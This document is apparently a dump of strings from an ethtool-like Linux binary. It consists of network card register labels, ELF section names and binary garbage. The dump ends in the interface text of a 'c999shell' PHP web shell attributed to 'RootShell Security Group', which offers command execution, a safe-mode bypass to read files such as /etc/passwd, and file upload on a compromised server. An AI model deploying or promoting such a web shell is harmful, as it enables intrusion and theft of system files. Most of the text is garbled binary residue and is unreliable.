0x9c: ANNPTR (Autoneg Next Page Tx):     0x%04x
0xc0: PHYSTS (Phy Status):               0x%04x
      Link %s
      %d Mb/s
      %s Duplex
      Auto-Negotiation %sComplete
      %s Polarity
0xc4: MICR (MII Interrupt Control):      0x%04x
0xc8: MISR (MII Interrupt Status):       0x%04x
      Rx Error Counter Half-Full Interrupt %s
      False Carrier Counter Half-Full Interrupt %s
      Auto-Negotiation Complete Interrupt %s
      Remote Fault Interrupt %s
      Jabber Interrupt %s
      Link Change Interrupt %s
0xcc: PGSEL (Phy Register Page Select):  0x%04x
0xd0: FCSCR (False Carrier Counter):     0x%04x
0xd4: RECR (Rx Error Counter):           0x%04x
0xd8: PCSR (100Mb/s PCS Config/Status):  0x%04x
      NRZI Bypass %s
      %s Signal Detect Algorithm
      %s Signal Detect Operation
      True Quiet Mode %s
      Rx Clock is %s
      4B/5B Operation %s
      Forced 100 Mb/s Good Link
0xe4: PHYCR (Phy Control):               0x%04x
      Phy Address = 0x%x (%d)
      %sPause Compatible with Link Partner
      LED Stretching %s
      Phy Self Test %s
      Self Test Sequence = PSR%d
0xe8: TBTSCR (10Base-T Status/Control):  0x%04x
      Jabber %s
      Heartbeat %s
      Polarity Auto-Sense/Correct %s
      %s Polarity %s
      Normal Link Pulse %s
      10 Mb/s Loopback %s
      Forced 10 Mb/s Good Link
0xe4: PMDCSR:                            0x%04x
0xf4: DSPCFG:                            0x%04x
0xf8: SDCFG:                             0x%04x
0xfc: TSTDAT:                            0x%04x
Driver:  %s
Version: %s
APROM:   %04x CSR%02d:  BCR%02d:  MII%02d:  BABL CERR MISS MERR RINT IDON INTR RXON TXON TDMD STOP INIT BABLM MISSM MERRM RINTM TINTM IDONM DXSUFLO LAPPEN DXMT2PD EMBA BSWP EN124 DMAPLUS TXDPOLL APAD_XMT ASTRP_RCV MFCO MFCON UINTCMD UINT RCVCCO RCVCCOM TXSTRT TXSTRTM JAB JABM TOKINTD LTINTEN SINT SINTE SLPINT SLPINTE EXDINT EXDINTE MPPLBA MPINT MPINTE MPEN MPMODE SPND FASTSPNDE RXFRTG RDMD RXDPOLL STINT STINTE MREINT MREINTE MAPINT MAPINTE MCCINT MCCINTE MCCIINT MCCIINTE MIIPDTINT MIIPDTINTE   PCnet/PCI 79C970  PCnet/PCI II 79C970A  PCnet/FAST 79C971  PCnet/FAST+ 79C972  PCnet/FAST III 79C973  PCnet/Home 79C978  PCnet/FAST III 79C975  PCnet/PRO 79C976VER: %04x  PARTIDU: %04x
TMAULOOP LEDPE APROMWE INTLEVEL EADISEL AWAKE ASEL XMAUSEL PVALID EEDET CSR0:   Status and Control         0x%04x
  CSR3:   Interrupt Mask             0x%04x
  CSR4:   Test and Features          0x%04x
  CSR5:   Ext Control and Int 1      0x%04x
  CSR7:   Ext Control and Int 2      0x%04x
  CSR15:  Mode                       0x%04x
CSR40:  Current RX Byte Count      0x%04x
CSR41:  Current RX Status          0x%04x
CSR42:  Current TX Byte Count      0x%04x
CSR43:  Current TX Status          0x%04x
CSR88:  Chip ID Lower              0x%04x
CSR89:  Chip ID Upper              0x%04x
  CSR112: Missed Frame Count         0x%04x
CSR114: RX Collision Count         0x%04x
BCR2:   Misc. Configuration        0x%04x
  BCR9:   Full-Duplex Control        0x%04x
BCR18:  Burst and Bus Control      0x%04x
BCR19:  EEPROM Control and Status  0x%04x
  BCR23:  PCI Subsystem Vendor ID    0x%04x
BCR24:  PCI Subsystem ID           0x%04x
BCR31:  Software Timer             0x%04x
BCR32:  MII Control and Status     0x%04x
BCR35:  PCI Vendor ID              0x%04x
RxErr TxErr RxNoBuf LinkChg RxFIFO TxNoBuf SWInt TimeOut SERR       %s%s%s%s%s%s%s%s%s%s%s
unknown RealTek chip
ERxOK ERxOverWrite ERxBad ERxGood       %s%s%s%s
, RESET      Big-endian mode
      Home LAN enable
      VLAN de-tagging
      RX checksumming
      PCI 64-bit DAC
      PCI Multiple RW
RTL-8139RTL-8139-KRTL-8139ARTL-8139A-GRTL-8139BRTL-8130RTL-8139CRTL-8100RTL-8100B/8139DRTL-8139C+RTL-8101RTL-8168B/8111BRTL-8101ERTL-8169RTL-8169sRTL-8110RealTek %s registers:
------------------------------
0x00: MAC Address                      %02x:%02x:%02x:%02x:%02x:%02x
0x08: Multicast Address Filter     0x%08x 0x%08x
0x10: Dump Tally Counter Command   0x%08x 0x%08x
0x20: Tx Normal Priority Ring Addr 0x%08x 0x%08x
0x28: Tx High Priority Ring Addr   0x%08x 0x%08x
0x10: Transmit Status Desc 0                  0x%08x
0x14: Transmit Status Desc 1                  0x%08x
0x18: Transmit Status Desc 2                  0x%08x
0x1C: Transmit Status Desc 3                  0x%08x
0x20: Transmit Start Addr  0                  0x%08x
0x24: Transmit Start Addr  1                  0x%08x
0x28: Transmit Start Addr  2                  0x%08x
0x2C: Transmit Start Addr  3                  0x%08x
0x30: Flash memory read/write                 0x%08x
0x30: Rx buffer addr (C mode)                 0x%08x
0x34: Early Rx Byte Count                       %8u
0x36: Early Rx Status                               0x%02x
0x37: Command                                       0x%02x
      Rx %s, Tx %s%s
0x38: Current Address of Packet Read (C mode)     0x%04x
0x3A: Current Rx buffer address (C mode)          0x%04x
0x3C: Interrupt Mask                              0x%04x
0x3E: Interrupt Status                            0x%04x
0x40: Tx Configuration                        0x%08x
0x44: Rx Configuration                        0x%08x
0x48: Timer count                             0x%08x
0x4C: Missed packet counter                     0x%06x
0x50: EEPROM Command                                0x%02x
0x51: Config 0                                      0x%02x
0x52: Config 1                                      0x%02x
0x53: Config 2                                      0x%02x
0x54: Config 3                                      0x%02x
0x55: Config 4                                      0x%02x
0x56: Config 5                                      0x%02x
0x58: Timer interrupt                         0x%08x
0x5C: Multiple Interrupt Select                   0x%04x
0x60: PHY access                              0x%08x
0x64: TBI control and status                  0x%08x
0x68: TBI Autonegotiation advertisement (ANAR)    0x%04x
0x6A: TBI Link partner ability (LPAR)             0x%04x
0x6C: PHY status                                    0x%02x
0x84: PM wakeup frame 0            0x%08x 0x%08x
0x8C: PM wakeup frame 1            0x%08x 0x%08x
0x94: PM wakeup frame 2 (low)      0x%08x 0x%08x
0x9C: PM wakeup frame 2 (high)     0x%08x 0x%08x
0xA4: PM wakeup frame 3 (low)      0x%08x 0x%08x
0xAC: PM wakeup frame 3 (high)     0x%08x 0x%08x
0xB4: PM wakeup frame 4 (low)      0x%08x 0x%08x
0xBC: PM wakeup frame 4 (high)     0x%08x 0x%08x
0xC4: Wakeup frame 0 CRC                          0x%04x
0xC6: Wakeup frame 1 CRC                          0x%04x
0xC8: Wakeup frame 2 CRC                          0x%04x
0xCA: Wakeup frame 3 CRC                          0x%04x
0xCC: Wakeup frame 4 CRC                          0x%04x
0xDA: RX packet maximum size                      0x%04x
0x54: Timer interrupt                         0x%08x
0x58: Media status                                  0x%02x
0x59: Config 3                                      0x%02x
0x5A: Config 4                                      0x%02x
0x78: PHY parameter 1                         0x%08x
0x7C: Twister parameter                       0x%08x
0x80: PHY parameter 2                               0x%02x
0x82: Low addr of a Tx Desc w/ Tx DMA OK          0x%04x
0x82: MII register                                  0x%02x
0x84: PM CRC for wakeup frame 0                     0x%02x
0x85: PM CRC for wakeup frame 1                     0x%02x
0x86: PM CRC for wakeup frame 2                     0x%02x
0x87: PM CRC for wakeup frame 3                     0x%02x
0x88: PM CRC for wakeup frame 4                     0x%02x
0x89: PM CRC for wakeup frame 5                     0x%02x
0x8A: PM CRC for wakeup frame 6                     0x%02x
0x8B: PM CRC for wakeup frame 7                     0x%02x
0x8C: PM wakeup frame 0            0x%08x 0x%08x
0x94: PM wakeup frame 1            0x%08x 0x%08x
0x9C: PM wakeup frame 2            0x%08x 0x%08x
0xA4: PM wakeup frame 3            0x%08x 0x%08x
0xAC: PM wakeup frame 4            0x%08x 0x%08x
0xB4: PM wakeup frame 5            0x%08x 0x%08x
0xBC: PM wakeup frame 6            0x%08x 0x%08x
0xC4: PM wakeup frame 7            0x%08x 0x%08x
0xCC: PM LSB CRC for wakeup frame 0                 0x%02x
0xCD: PM LSB CRC for wakeup frame 1                 0x%02x
0xCE: PM LSB CRC for wakeup frame 2                 0x%02x
0xCF: PM LSB CRC for wakeup frame 3                 0x%02x
0xD0: PM LSB CRC for wakeup frame 4                 0x%02x
0xD1: PM LSB CRC for wakeup frame 5                 0x%02x
0xD2: PM LSB CRC for wakeup frame 6                 0x%02x
0xD3: PM LSB CRC for wakeup frame 7                 0x%02x
0xD4: Flash memory read/write                 0x%08x
0xD8: Config 5                                      0x%02x
0xE0: C+ Command                                  0x%04x
0xE2: Interrupt Mitigation                        0x%04x
      TxTimer:       %u
      TxPackets:     %u
      RxTimer:       %u
      RxPackets:     %u
0xE4: Rx Ring Addr                 0x%08x 0x%08x
0xEC: Early Tx threshold                            0x%02x
0xFC: External MII register                   0x%08x
0x5E: PCI revision id                               0x%02x
0x60: Transmit Status of All Desc (C mode)        0x%04x
0x62: MII Basic Mode Control Register             0x%04x
0x64: MII Basic Mode Status Register              0x%04x
0x66: MII Autonegotiation Advertising             0x%04x
0x68: MII Link Partner Ability                    0x%04x
0x6A: MII Expansion                               0x%04x
0x6C: MII Disconnect counter                      0x%04x
0x6E: MII False carrier sense counter             0x%04x
0x70: MII Nway test                               0x%04x
0x72: MII RX_ER counter                           0x%04x
0x74: MII CS configuration                        0x%04x
Address   	Data
----------	----
0x%08x	0x%02x
Offset	Value
------	----------
0x%04x	0x%08x
\H \"$$((, ,004488<=@@DXDHHLLPRTVXZ\ ]``hHhp4p|@~
%s
Control Registers%-32s 0x%08X

%s (disabled)
	Init 0x%08X Value 0x%08X
LEDAddr %d            %02X%c
PCI config
----------%02x:%12s address:  %02X %02XPhysical
MAC AddressesGenesisYukonYukon-LiteYukon-LPYukon-2 XLYukon ExtremeYukon-2 EC UltraYukon-2 ECYukon-2 FE(Unknown) (rev %d)

Bus Management Unit-------------------
Status BMU:
-----------
Status FIFOStatus levelTX statusISRRx GMAC 1Tx GMAC 1Receive Queue 1Sync Transmit Queue 1Async Transmit Queue 1Receive RAMbuffer 1Sync Transmit RAMbuffer 1Async Transmit RAMbuffer 1Receive RAMbuffer 2Sync Transmit RAMbuffer 2Async Transmit RAMbuffer 21Rx GMAC 2Tx GMAC 2TimerIRQ ModerationBlink SourceReceive MAC FIFO 1Transmit MAC FIFO 1Receive Queue 2Async Transmit Queue 2Sync Transmit Queue 2Receive MAC FIFO 2Transmit MAC FIFO 2Descriptor PollEnd AddressAlmost Full ThreshControl/TestFIFO Flush MaskFIFO Flush ThresholdTruncation ThresholdUpper Pause ThresholdLower Pause ThresholdVLAN TagFIFO Write PointerFIFO Write LevelFIFO Read PointerFIFO Read LevelBuffer control                   0x%04X
Byte Counter                     %d
Descriptor Address               0x%08X%08X
Status                           0x%08X
Timestamp                        0x%08X
BMU Control/Status               0x%08X
Done                             0x%04X
Request                          0x%08X%08X
Csum1      Offset %4d Position   %d
Csum2      Offset %4d Position  %d
Csum Start 0x%04X Pos %4d Write %d
Register Access Port             0x%02X
LED Control/Status               0x%08X
Interrupt Source                 0x%08X
Interrupt Mask                   0x%08X
Interrupt Hardware Error Source  0x%08X
Interrupt Hardware Error Mask    0x%08X
Start Address                    0x%08X
End Address                      0x%08X
Write Pointer                    0x%08X
Read Pointer                     0x%08X
Upper Threshold/Pause Packets    0x%08X
Lower Threshold/Pause Packets    0x%08X
Upper Threshold/High Priority    0x%08X
Lower Threshold/High Priority    0x%08X
Packet Counter                   0x%08X
Level                            0x%08X
Control                          0x%08X
	Test 0x%02X       Control 0x%02X
Control/Test                     0x%08X
Status                       0x%04X
Control                      0x%04X
Transmit                     0x%04X
Receive                      0x%04X
Transmit flow control        0x%04X
Transmit parameter           0x%04X
Serial mode                  0x%04X
Connector type               0x%02X (%c)
PMD type                     0x%02X (%c)
PHY type                     0x%02X
Chip Id                      0x%02X Ram Buffer                   0x%02X
Descriptor Address       0x%08X%08X
Address Counter          0x%08X%08X
Current Byte Counter             %d
Flag & FIFO Address              0x%08X
Next                             0x%08X
Data                     0x%08X%08X
Csum1      Offset %4d Position  %d
CSR Receive Queue 1              0x%08X
CSR Sync Queue 1                 0x%08X
CSR Async Queue 1                0x%08X
CSR Receive Queue 2              0x%08X
CSR Async Queue 2                0x%08X
CSR Sync Queue 2                 0x%08X
Control                                0x%08X
Last Index                             0x%04X
Put Index                              0x%04X
List Address                           0x%08X%08X
Transmit 1 done index                  0x%04X
Transmit 2 done index                  0x%04X
Transmit index threshold               0x%04X
	Write Pointer            0x%02X
	Read Pointer             0x%02X
	Level                    0x%02X
	Watermark                0x%02X
	ISR Watermark            0x%02X

GMAC control             0x%04X
GPHY control             0x%04X
LINK control             0x%02hX
T!`!s!!!!!!!!""%"versioncmd%08x = %08x
ethtool_regs
%-20s = %04x
%-20s = %04x
LAN911x Registers
index 1, MAC_CR   = 0x%08X
index 2, ADDRH    = 0x%08X
index 3, ADDRL    = 0x%08X
index 4, HASHH    = 0x%08X
index 5, HASHL    = 0x%08X
index 6, MII_ACC  = 0x%08X
index 7, MII_DATA = 0x%08X
index 8, FLOW     = 0x%08X
index 9, VLAN1    = 0x%08X
index A, VLAN2    = 0x%08X
index B, WUFF     = 0x%08X
index C, WUCSR    = 0x%08X
PHY Registers
index 7, Reserved = 0x%04X
index 8, Reserved = 0x%04X
index 9, Reserved = 0x%04X
index 10, Reserved = 0x%04X
index 11, Reserved = 0x%04X
index 12, Reserved = 0x%04X
index 13, Reserved = 0x%04X
index 14, Reserved = 0x%04X
index 15, Reserved = 0x%04X
index 19, Reserved = 0x%04X
index 20, TSTCNTL = 0x%04X
index 21, TSTREAD1 = 0x%04X
index 22, TSTREAD2 = 0x%04X
index 23, TSTWRITE = 0x%04X
index 24, Reserved = 0x%04X
index 25, Reserved = 0x%04X
index 26, Reserved = 0x%04X
offset 0x50, ID_REV       = 0x%08X
offset 0x54, INT_CFG      = 0x%08X
offset 0x58, INT_STS      = 0x%08X
offset 0x5C, INT_EN       = 0x%08X
offset 0x60, RESERVED     = 0x%08X
offset 0x64, BYTE_TEST    = 0x%08X
offset 0x68, FIFO_INT     = 0x%08X
offset 0x6C, RX_CFG       = 0x%08X
offset 0x70, TX_CFG       = 0x%08X
offset 0x74, HW_CFG       = 0x%08X
offset 0x78, RX_DP_CTRL   = 0x%08X
offset 0x7C, RX_FIFO_INF  = 0x%08X
offset 0x80, TX_FIFO_INF  = 0x%08X
offset 0x84, PMT_CTRL     = 0x%08X
offset 0x88, GPIO_CFG     = 0x%08X
offset 0x8C, GPT_CFG      = 0x%08X
offset 0x90, GPT_CNT      = 0x%08X
offset 0x94, FPGA_REV     = 0x%08X
offset 0x98, ENDIAN       = 0x%08X
offset 0x9C, FREE_RUN     = 0x%08X
offset 0xA0, RX_DROP      = 0x%08X
offset 0xA4, MAC_CSR_CMD  = 0x%08X
offset 0xA8, MAC_CSR_DATA = 0x%08X
offset 0xAC, AFC_CFG      = 0x%08X
offset 0xB0, E2P_CMD      = 0x%08X
offset 0xB4, E2P_DATA     = 0x%08X
index 0, Basic Control Reg = 0x%04X
index 1, Basic Status Reg  = 0x%04X
index 2, PHY identifier 1  = 0x%04X
index 3, PHY identifier 2  = 0x%04X
index 4, Auto Negotiation Advertisement Reg = 0x%04X
index 5, Auto Negotiation Link Partner Ability Reg = 0x%04X
index 6, Auto Negotiation Expansion Register = 0x%04X
index 16, Silicon Revision Reg = 0x%04X
index 17, Mode Control/Status Reg = 0x%04X
index 18, Special Modes = 0x%04X
index 27, Control/Status Indication = 0x%04X
index 28, Special internal testability = 0x%04X
index 29, Interrupt Source Register = 0x%04X
index 30, Interrupt Mask Register = 0x%04X
index 31, PHY Special Control/Status Register = 0x%04X
;X*RpSTUVfj,mPtP4Tt0@P'p()`+0,, .,.H/d001p1205@7 p;@=`>|zAB
AG8 AB
FX0AB
BFxAD
!AB
AG AB
IIE AB
IVE WAG
TGE(D	FAB
DHAB
FhAB
Ap-AB
jAB
IAG
F%	AG
FAB
EAB
BF<
AG
F\IAB
AxAB
F+AB
I<UAB
F0O+AE
F`PAB
C_AB
E8`AB
BCXaAB
ACxcAB
APd]AB
ACdAB
AC@f\AB
AfAB
AgAB
AC,PhAB
ADL iiAB
ACliAB
AjAB
AFPmAB
AC`o.AB
Fs~AB
FvAB
F(vAB
E`
hohG
@H0ooooo(o,o@04p?P S0ٳ p`XApƲвKp4޲ TCP=˲@<>1F5F9F>FED1FLF>DRFzEFrEF~EFr EFX$EF`(EF~,EGi0EHGu4ELG8ExG<EDG@EPGDEdGHE$GnjLE(GьPE,GތTE0GXE4G\E8G`E<GdE@GhETG'lEXG5pE\GBtE`GPxEhG^|ElGmEpG{EtGrD~DEEEEE@`ppx%|.t8xA@tQt\te8u4`ed__gmon_start__libc.so.6_IO_stdin_usedsocket__printf_chkexit_IO_putcfopenstrncmp__strdupperrorputs__stack_chk_failputcharreallocabortcallocstrlenmemsetstrstr__errno_location__fprintf_chkstdoutfputcmemcpyfclose__strtol_internalsscanfstderrioctl__fxstatfilenofwritefread__strcpy_chkstrcmpstrerror__libc_start_mainfreeGLIBC_2.4GLIBC_2.1GLIBC_2.3.4GLIBC_2.0/lib/ld-linux.so.2ethtool.debugҎTELF44 (444444ľľ@@(@@HHH  Ptd  8 8\\Qtd44HH !ohh,+p3;oNHoPW	00`	HHi``dxx@o	uhh{  8 \|9|H@@@@@@A @F(D (<.shstrtab.interp.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.dynbss.gnu.liblist.gnu.conflict.gnu.prelink_undo44HH !ohh,+po(,,;oNHoPW	00`	HHi``dxx@o	uhh{  8 \|9|H@@@@@@A @F@ HFH< 3G$8D|

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0072 ]--